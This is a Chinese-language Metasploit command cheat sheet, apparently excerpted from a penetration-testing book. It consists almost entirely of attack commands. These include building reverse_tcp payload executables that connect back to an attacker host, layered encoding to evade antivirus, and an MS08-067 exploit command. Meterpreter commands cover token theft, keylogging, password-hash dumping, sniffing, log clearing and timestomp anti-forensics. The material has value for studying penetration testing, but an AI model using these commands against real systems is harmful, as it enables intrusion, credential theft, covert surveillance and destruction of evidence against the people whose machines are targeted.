metasploit命令参考
节选自《metasploit渗透测试指南》
show exploits 列出所有渗透攻击模块
show payloads 列出所有攻击载荷
show auxiliary 列出所有辅助模块
search name 搜索
info 列出详细信息
use name 使用
show options 查看参数
show targets 查看某模块支持的目标平台
show advanced 查看高级选项
set autorunscript migrate -f 攻击完成后自动迁移到另一个进程
check 检测目标是否对选定的渗透攻击存在相应的漏洞
exploit 执行渗透攻击
exploit -j 后台执行
exploit -z 成功渗透后不与会话交互
exploit -e encoder 指定攻击载荷编码方式
exploit -h 帮助
sessions -l 列出多个会话
sessions -l -v 列出会话同时列出详细信息
sessions -s scritp 在所有活跃会话中执行特定meterpreter脚本
sessions -K 杀死所有活跃会话
sessions -c cmd 在所有活跃会话上执行某命定
sessions -u sessionID 升级一个普通的win shell 到 meterpreter shell
db_conreate name 创建数据库
db_connect name 链接数据库
db_namp 把namp的扫描结果存入数据库 hosts services查看结果
db_autopwn -h
db_autopwn -p -r-e 对发现的所有端口执行db_autopwn
db_destroy 删除当前数据库
db_destory user:pswd@host:port/dbname
db_status 查看
meterpreter命令
help 帮助
run scriptname 运行meterpreter脚本, 在scripts/meterpreter目录
sysinfo列出受控住记系统信息
ls 列目录
use priv 扩展meterpreter库
ps 列进程
migrate PID 迁移
use incognito 加载incognito功能来盗取用户令牌
list_tokens -u 列出目标主机用户可用令牌
list_tokens -g 同上,列出用户组的
impersonate_token DOMAIN_NAME\\USERNAME
steal_token PID 到去给定进程的可用令牌进行假冒
drop_token 停止假冒令牌
getsystem 提权
shell 利用可用令牌运行shell
execute -f cmd.exe -i 执行cmd
execute -f cmd.exe -i -t 用可用令牌执行cmd
execute -f cmd.exe -i -H -t 用所有可用令牌执行cmd并隐藏该进程
rev2self 回到初始用户
reg commend 操作注册表
setdesktop number 切换用户界面
screenshot 屏幕截图
upload/download file 上传下载文件
keyscan_start/dump/stop 键盘记录
getprivs 提权??
uictl enable keyboart/mouse 操纵目标的键盘鼠标
background 将当前的seterpreter shell 转为后台执行
hashdump 导出目标主机口令hash值
use sniffer 加载嗅探模块
sniffer_interfaces 列出开放大端口
sniffer_dump interfaceID pcapname 启动嗅探
sniffer_start interfaceID packer-buffer 数据包缓冲区嗅探
sniffer_stats interfaceID 嗅探的统计数据
sniffer_stop interfaceID 停止嗅探
clearv 清除日志
timestomp 修改文件属性 反取证调查
reboot 重起
msfpayload命令
msfpayload -h 帮助
msfpayload windows/meterpreter/bind_tcp O 列出可用的攻击载荷
msfpayload windows/meterpreter/bind_tcp O. 列出可用的攻击载荷配置项
msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xx X > payload.exe 生成exe
msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xx R > payload.raw 生成raw原始文件,在msfencode中使用
msfpayload windows/meterpreter/bind_tcp LPORT=xx C > payload.c 生成c格式的shell code
msfpayload windows/meterpreter/bind_tcp LPORT=xx J > payload.java 生成javascript字符串
msfencode 命令
-h 帮助
-l 列出可用的编码器
-k 隐藏(不一定每次都可用)
msfencode -i raw文件 -o 输出文件名 -x 指定模板 -e 编码器 -c 次数 -t 生成什么格式
msfpayload windows/meterpreter/bind_tcp LPORT=xx R|msfencode -e x86/_countdown -c 5 -t raw| msfencode -e x86/shikata_ga_nai -c 5 -t exe -o mulit_encode.exe
多次编码示例
msfencode -i xx.raw BufferRedister=ESI -e x86/alpha_mixed -t c 创建一个纯数字字母的shellcode 由esi指向,c语言输出
msfcli命令
msfcli|gerp exploit 列出攻击模块
msfcli|grep exploit/windows 列出windows相关模块
msfcli expliot/windows/smb/ms08_067_netapi PAYLOAD= windows/meterpreter/bind_tcp LPORT=443 RHOST=x.x.x.x E
对目标发起netapi攻击 bind_tcp载荷 绑定443端口